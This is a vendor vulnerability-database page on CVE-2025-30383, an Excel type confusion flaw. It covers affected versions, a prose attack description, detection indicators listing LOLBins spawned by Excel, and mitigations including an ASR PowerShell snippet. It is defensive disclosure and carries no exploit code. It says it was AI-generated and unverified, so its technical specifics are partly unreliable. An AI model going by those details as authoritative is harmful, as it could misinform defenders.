Skip to main content
A Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection. Six years running.Find Out Why
CVE Vulnerability Database
Vulnerability Database/CVE-2025-30383

CVE-2025-30383: Microsoft 365 Apps RCE Vulnerability

CVE-2025-30383 is a type confusion remote code execution vulnerability in Microsoft Office Excel that enables attackers to execute unauthorized code locally. This article covers technical details, affected versions, and mitigations.

Published:

CVE-2025-30383 Overview

CVE-2025-30383 is a type confusion vulnerability [CWE-843] in Microsoft Office Excel that allows an unauthorized attacker to execute code locally. The flaw arises when Excel accesses a resource using an incompatible type, leading to memory corruption that an attacker can leverage for arbitrary code execution. Exploitation requires user interaction, typically by opening a crafted Excel document. The vulnerability affects multiple Microsoft Office product lines, including Microsoft 365 Apps, Excel 2016, Office 2019, Office Long Term Servicing Channel (LTSC) 2021 and 2024, and Office Online Server.

Critical Impact

Successful exploitation grants the attacker code execution in the context of the current user, enabling data theft, lateral movement, or installation of follow-on malware.

Affected Products

  • Microsoft 365 Apps (Enterprise, x64 and x86)
  • Microsoft Excel 2016, Microsoft Office 2019, Office LTSC 2021 and 2024
  • Microsoft Office Online Server

Discovery Timeline

  • 2025-05-13 - CVE-2025-30383 published to the National Vulnerability Database (NVD)
  • 2026-06-17 - Last updated in the NVD database

Technical Details for CVE-2025-30383

Vulnerability Analysis

The vulnerability is classified under [CWE-843] as access of a resource using an incompatible type, commonly referred to as type confusion. Excel parses complex binary and OOXML structures that reference internal objects by type-tagged pointers. When the parser misinterprets a structure as a different object type than what was actually allocated, subsequent operations read or write memory through an incorrect type interpretation. This mismatch corrupts internal state and can be steered to produce attacker-controlled execution.

Microsoft categorizes the attack vector as local, requiring user interaction. A target must open a crafted spreadsheet for exploitation to succeed. Because Excel commonly previews attachments and supports embedded objects, phishing remains the most likely delivery channel.

Root Cause

The root cause is incorrect type validation during deserialization of objects within an Excel document. The application trusts a type identifier in the file structure without confirming that the underlying object matches the expected layout. Operating on the mismatched object produces deterministic memory corruption that an attacker can shape into a controlled write primitive.

Attack Vector

An attacker crafts a malicious .xlsx, .xlsb, or legacy .xls file containing manipulated object references that trigger the type confusion. The attacker then delivers the file through email, a shared drive, or a web download. When a user opens the document, Excel parses the malformed structure and executes attacker-supplied logic in the user's security context. Combined with a separate sandbox escape, the technique can be used in multi-stage intrusion chains.

No verified public proof-of-concept code is available. See the Microsoft Security Update Guide CVE-2025-30383 for vendor-supplied technical details.

Detection Methods for CVE-2025-30383

Indicators of Compromise

  • Excel (EXCEL.EXE) spawning child processes such as cmd.exe, powershell.exe, rundll32.exe, or wscript.exe shortly after a document open.
  • Unexpected outbound network connections initiated by EXCEL.EXE to external IP addresses or newly registered domains.
  • Creation of executable or script files in user-writable directories (%TEMP%, %APPDATA%) by Office processes.
  • Crash events or Windows Error Reporting (WER) entries referencing access violations inside Excel modules.

Detection Strategies

  • Hunt for process lineage where Office binaries are the parent of scripting interpreters or LOLBins.
  • Inspect inbound email attachments and SharePoint uploads for Excel files containing anomalous embedded objects or OLE streams.
  • Correlate Excel crashes with subsequent persistence indicators such as Run key modifications or scheduled task creation.

Monitoring Recommendations

  • Enable Microsoft Defender Attack Surface Reduction (ASR) rules that block Office applications from creating child processes and from injecting code into other processes.
  • Forward Sysmon Event IDs 1 (process create), 7 (image load), and 11 (file create) from endpoints running Office to a centralized SIEM for analysis.
  • Track Office telemetry for Protected View bypasses and unsigned macro execution attempts.

How to Mitigate CVE-2025-30383

Immediate Actions Required

  • Apply the Microsoft security updates referenced in the Microsoft Security Update Guide CVE-2025-30383 across all affected Office channels.
  • Inventory all hosts running Microsoft 365 Apps, Excel 2016, Office 2019, Office LTSC 2021/2024, and Office Online Server, and confirm patch deployment status.
  • Enforce Protected View and Block Macros from the Internet through Group Policy for all Office users.
  • Restrict end-user execution of spreadsheets received from external senders until patching is complete.

Patch Information

Microsoft released security updates addressing CVE-2025-30383 through the standard Microsoft Update channels for each affected product. Administrators should consult the vendor advisory for product-specific KB numbers and deploy updates through Windows Update, Microsoft Update Catalog, or Microsoft Endpoint Configuration Manager.

Workarounds

  • Open untrusted Excel files only in Protected View and disable editing unless the source is verified.
  • Disable ActiveX controls and Object Linking and Embedding (OLE) where business workflows permit.
  • Use Microsoft Defender Application Guard for Office to isolate untrusted documents from the host operating system.
bash
# Configuration example - enable ASR rules to block Office child processes via PowerShell
Set-MpPreference -AttackSurfaceReductionRules_Ids `
    D4F940AB-401B-4EFC-AADC-AD5F3C50688A `
    -AttackSurfaceReductionRules_Actions Enabled

# Block Office from creating executable content
Add-MpPreference -AttackSurfaceReductionRules_Ids `
    3B576869-A4EC-4529-8536-B80A7769E899 `
    -AttackSurfaceReductionRules_Actions Enabled

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.

Try SentinelOne